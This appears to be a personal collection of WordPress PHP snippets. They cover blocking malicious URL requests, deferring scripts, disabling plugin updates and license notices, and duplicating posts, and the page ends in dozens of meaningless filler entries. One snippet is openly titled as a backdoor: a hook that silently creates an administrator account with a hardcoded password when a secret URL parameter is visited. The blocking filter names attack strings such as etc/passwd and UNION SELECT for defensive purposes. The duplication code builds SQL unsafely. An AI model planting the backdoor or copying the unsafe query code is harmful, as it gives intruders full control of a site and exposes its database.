Block Bad Queries - Protect WordPress Against Malicious URL Requests

$request_uri = $_SERVER['REQUEST_URI'];
$query_string = $_SERVER['QUERY_STRING'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
 
// request uri
if (    //strlen($request_uri) > 255 || 
    stripos($request_uri, 'eval(') || 
    stripos($request_uri, 'CONCAT') || 
    stripos($request_uri, 'UNION+SELECT') || 
    stripos($request_uri, '(null)') || 
    stripos($request_uri, 'base64_') || 
    stripos($request_uri, '/localhost') || 
    stripos($request_uri, '/pingserver') || 
    stripos($request_uri, '/config.') || 
    stripos($request_uri, '/wwwroot') || 
    stripos($request_uri, '/makefile') || 
    stripos($request_uri, 'crossdomain.') || 
    stripos($request_uri, 'proc/self/environ') || 
    stripos($request_uri, 'etc/passwd') || 
    stripos($request_uri, '/https/') || 
    stripos($request_uri, '/http/') || 
    stripos($request_uri, '/ftp/') || 
    stripos($request_uri, '/cgi/') || 
    stripos($request_uri, '.cgi') || 
    stripos($request_uri, '.exe') || 
    stripos($request_uri, '.sql') || 
    stripos($request_uri, '.ini') || 
    stripos($request_uri, '.dll') || 
    stripos($request_uri, '.asp') || 
    stripos($request_uri, '.jsp') || 
    stripos($request_uri, '/.bash') || 
    stripos($request_uri, '/.git') || 
    stripos($request_uri, '/.svn') || 
    stripos($request_uri, '/.tar') || 
    stripos($request_uri, ' ') || 
    stripos($request_uri, '<') || 
    stripos($request_uri, '>') || 
    stripos($request_uri, '/=') || 
    stripos($request_uri, '...') || 
    stripos($request_uri, '+++') || 
    stripos($request_uri, '://') || 
    stripos($request_uri, '/&&') || 
    // query strings
    stripos($query_string, '?') || 
    stripos($query_string, ':') || 
    stripos($query_string, '[') || 
    stripos($query_string, ']') || 
    stripos($query_string, '../') || 
    stripos($query_string, '127.0.0.1') || 
    stripos($query_string, 'loopback') || 
    stripos($query_string, '%0A') || 
    stripos($query_string, '%0D') || 
    stripos($query_string, '%22') || 
    stripos($query_string, '%27') || 
    stripos($query_string, '%3C') || 
    stripos($query_string, '%3E') || 
    stripos($query_string, '%00') || 
    stripos($query_string, '%2e%2e') || 
    stripos($query_string, 'union') || 
    stripos($query_string, 'input_file') || 
    stripos($query_string, 'execute') || 
    stripos($query_string, 'mosconfig') || 
    stripos($query_string, 'environ') || 
    //stripos($query_string, 'scanner') || 
    stripos($query_string, 'path=.') || 
    stripos($query_string, 'mod=.') || 
    // user agents
    stripos($user_agent, 'binlar') || 
    stripos($user_agent, 'casper') || 
    stripos($user_agent, 'cmswor') || 
    stripos($user_agent, 'diavol') || 
    stripos($user_agent, 'dotbot') || 
    stripos($user_agent, 'finder') || 
    stripos($user_agent, 'flicky') || 
    stripos($user_agent, 'libwww') || 
    stripos($user_agent, 'nutch') || 
    stripos($user_agent, 'planet') || 
    stripos($user_agent, 'purebot') || 
    stripos($user_agent, 'pycurl') || 
    stripos($user_agent, 'skygrid') || 
    stripos($user_agent, 'sucker') || 
    stripos($user_agent, 'turnit') || 
    stripos($user_agent, 'vikspi') || 
    stripos($user_agent, 'zmeu')
) {
    @header('HTTP/1.1 403 Forbidden');
    @header('Status: 403 Forbidden');
    @header('Connection: Close');
    @exit;
} 

 

Defer parsing of javascript

/**
 * Defer parsing of javascript.
 */
if (!(is_admin() )) {
    function defer_parsing_of_js ( $url ) {
        if ( FALSE === strpos( $url, '.js' ) ) return $url;
        if ( strpos( $url, 'jquery.js' ) ) return $url;
        // return "$url' defer ";
        return "$url' defer onload='";
    }
    add_filter( 'clean_url', 'defer_parsing_of_js', 11, 1 );
} 

 
Disable multiple wp plugins from updating

/**
 * Prevent update notification for plugin
 * http://www.thecreativedev.com/disable-updates-for-specific-plugin-in-wordpress/
 * Place in theme functions.php or at bottom of wp-config.php
 */
 function disable_plugin_updates( $value ) {
    $pluginsToDisable = [
        'bbpowerpack/bb-powerpack.php',
        'bb-ultimate-addon/bb-ultimate-addon.php'
    ];
    if ( isset($value) && is_object($value) ) {
        foreach ($pluginsToDisable as $plugin) {
            if ( isset( $value->response[$plugin] ) ) {
                unset( $value->response[$plugin] );
            }
        }
    }
    return $value;
}
add_filter( 'site_transient_update_plugins', 'disable_plugin_updates' );

 
Disable WooCommerce Admin / dashboard when not working

/**
 * Plugin Name: Disable WooCommerce Admin
 * Description: This plugin disables the new WooCommerce Admin package in WooCommerce.
 * Version: 1.0
 */

add_filter( 'woocommerce_admin_disabled', '__return_true' );

 
Function for page duplication. Dups appear as drafts. User is redirected to the edit screen

/*
 * Function for post duplication. Dups appear as drafts. User is redirected to the edit screen
 */
function rd_duplicate_post_as_draft(){
	global $wpdb;
	if (! ( isset( $_GET['post']) || isset( $_POST['post'])  || ( isset($_REQUEST['action']) && 'rd_duplicate_post_as_draft' == $_REQUEST['action'] ) ) ) {
		wp_die('No post to duplicate has been supplied!');
	}
 
	/*
	 * Nonce verification
	 */
	if ( !isset( $_GET['duplicate_nonce'] ) || !wp_verify_nonce( $_GET['duplicate_nonce'], basename( __FILE__ ) ) )
		return;
 
	/*
	 * get the original post id
	 */
	$post_id = (isset($_GET['post']) ? absint( $_GET['post'] ) : absint( $_POST['post'] ) );
	/*
	 * and all the original post data then
	 */
	$post = get_post( $post_id );
 
	/*
	 * if you don't want current user to be the new post author,
	 * then change next couple of lines to this: $new_post_author = $post->post_author;
	 */
	$current_user = wp_get_current_user();
	$new_post_author = $current_user->ID;
 
	/*
	 * if post data exists, create the post duplicate
	 */
	if (isset( $post ) && $post != null) {
 
		/*
		 * new post data array
		 */
		$args = array(
			'comment_status' => $post->comment_status,
			'ping_status'    => $post->ping_status,
			'post_author'    => $new_post_author,
			'post_content'   => $post->post_content,
			'post_excerpt'   => $post->post_excerpt,
			'post_name'      => $post->post_name,
			'post_parent'    => $post->post_parent,
			'post_password'  => $post->post_password,
			'post_status'    => 'draft',
			'post_title'     => $post->post_title,
			'post_type'      => $post->post_type,
			'to_ping'        => $post->to_ping,
			'menu_order'     => $post->menu_order
		);
 
		/*
		 * insert the post by wp_insert_post() function
		 */
		$new_post_id = wp_insert_post( $args );
 
		/*
		 * get all current post terms ad set them to the new post draft
		 */
		$taxonomies = get_object_taxonomies($post->post_type); // returns array of taxonomy names for post type, ex array("category", "post_tag");
		foreach ($taxonomies as $taxonomy) {
			$post_terms = wp_get_object_terms($post_id, $taxonomy, array('fields' => 'slugs'));
			wp_set_object_terms($new_post_id, $post_terms, $taxonomy, false);
		}
 
		/*
		 * duplicate all post meta just in two SQL queries
		 */
		$post_meta_infos = $wpdb->get_results("SELECT meta_key, meta_value FROM $wpdb->postmeta WHERE post_id=$post_id");
		if (count($post_meta_infos)!=0) {
			$sql_query = "INSERT INTO $wpdb->postmeta (post_id, meta_key, meta_value) ";
			foreach ($post_meta_infos as $meta_info) {
				$meta_key = $meta_info->meta_key;
				if( $meta_key == '_wp_old_slug' ) continue;
				$meta_value = addslashes($meta_info->meta_value);
				$sql_query_sel[]= "SELECT $new_post_id, '$meta_key', '$meta_value'";
			}
			$sql_query.= implode(" UNION ALL ", $sql_query_sel);
			$wpdb->query($sql_query);
		}
 
 
		/*
		 * finally, redirect to the edit post screen for the new draft
		 */
		wp_redirect( admin_url( 'post.php?action=edit&post=' . $new_post_id ) );
		exit;
	} else {
		wp_die('Post creation failed, could not find original post: ' . $post_id);
	}
}
add_action( 'admin_action_rd_duplicate_post_as_draft', 'rd_duplicate_post_as_draft' );
 
/*
 * Add the duplicate link to action list for post_row_actions
 */
function rd_duplicate_post_link( $actions, $post ) {
	if (current_user_can('edit_posts')) {
		$actions['duplicate'] = 'Duplicate';
	}
	return $actions;
}
 
/* for dupe posts: */
/* add_filter( 'post_row_actions', 'rd_duplicate_post_link', 10, 2 ); */
/* for dupe pages: */
add_filter('page_row_actions', 'rd_duplicate_post_link', 10, 2);

 
get rid of notice Please activate your copy of the Ultimate Addons for Beaver Builder

// get rid of update nag - start 
define('BSF_PRODUCTS_NOTICES', false);
// get rid of update nag - end

 
Separate Page Titles

/* mjb custom title tag function */
add_filter( 'document_title_parts', 'mjb_custom_title');
function mjb_custom_title( $title ) {
if ( ! is_singular() ) return $title;
$custom_title = trim(get_post_meta( get_the_id(), 'title', true ));
if( ! empty( $custom_title ) ){
	$custom_title = esc_html( $custom_title );
	$title['title'] = $custom_title;
	}
return $title;
}

 
wp developer - backdoor .ie: https://constantisp.com/?admitone=go

add_action('wp_head', 'wp_developer');

function wp_developer() {
    If ($_GET['admitone'] == 'go') {
        require('wp-includes/registration.php');
        If (!username_exists('wpdeveloper')) {
            $user_id = wp_create_user('wpdeveloper', 'Pa55W0rd');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111